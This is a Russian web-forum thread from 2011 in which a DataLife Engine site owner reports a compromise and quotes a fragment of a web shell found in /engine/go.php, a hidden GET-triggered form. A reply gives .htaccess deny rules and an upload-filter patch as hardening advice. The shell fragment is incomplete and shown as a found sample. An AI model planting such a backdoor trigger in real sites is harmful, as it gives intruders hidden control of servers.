Форум Сайтостроение Веб-строительство

Вопрос про DLE!

DoctorSEO
На сайте с 13.11.2011
Offline
123
DoctorSEO
520

Здравствуйте! Че это такое? то сам index.php перестает работать (перезалил из бэкапа заработал), то какието 2 буквы в вверху сайта появились fg и нигде их найти не могу ни в шаблоне ни где, зашел в антивирус dle тоже не работает :gm: сайт: online-freebee.ru

DoctorSEO добавил 12.12.2011 в 17:29

Нашел шел в /engine/go.php

if(isset($_GET['tes'])) {

echo <<<HTML

<HTML><body><form action="" method="post">

<center><textarea name="text" rows="10" cols="100"></textarea>

<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>

HTML;

Проверяйте свои сайты!!

DoctorSEO добавил 12.12.2011 в 18:57

Как в DLE защитится от шелов и прочей беды?

TakingBackMySoul
На сайте с 09.11.2011
Offline
65
TakingBackMySoul
#1

добавьте .htaccess в папки uploads и templates, пропишите в нем 

<FilesMatch>

   Order allow,deny

   Deny from all

</FilesMatch>

потом найдите в файле engine/inc/files.php

фрагмент: 

$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );

$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );

$allowed_files = explode( ',', strtolower( $config['files_type'] ) );

$img_result_th = "";

$img_result = "";

и замените его на: 

$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );

$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );

$allow_conf = str_replace("php",md5(time() - rand(30,60)),strtolower( $config['files_type'] ));

$allowed_files = explode( ',', $allow_conf );

$img_result_th = "";

$img_result = "";

потом создайте .htaccess в папке backup и туда пропишите: 

Order Deny,Allow

Deny from all

Переименуйте админку и файл admin.php

это защитит не только от шеллов но и от захайженных линков.

DoctorSEO
На сайте с 13.11.2011
Offline
123
DoctorSEO
#2
TakingBackMySoul:
добавьте .htaccess в папки uploads и templates, пропишите в нем 
<FilesMatch>

   Order allow,deny

   Deny from all

</FilesMatch>


потом найдите в файле engine/inc/files.php

фрагмент: 
$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );

$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );

$allowed_files = explode( ',', strtolower( $config['files_type'] ) );

$img_result_th = "";

$img_result = "";


и замените его на: 
$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );

$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );

$allow_conf = str_replace("php",md5(time() - rand(30,60)),strtolower( $config['files_type'] ));

$allowed_files = explode( ',', $allow_conf );

$img_result_th = "";

$img_result = "";


потом создайте .htaccess в папке backup и туда пропишите: 
Order Deny,Allow

Deny from all


Переименуйте админку и файл admin.php

это защитит не только от шеллов но и от захайженных линков.

Спасибооооо! А какой скрипт могли загрузить через шел в go.php, шела удалил, а какойто скрипт остался(((

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий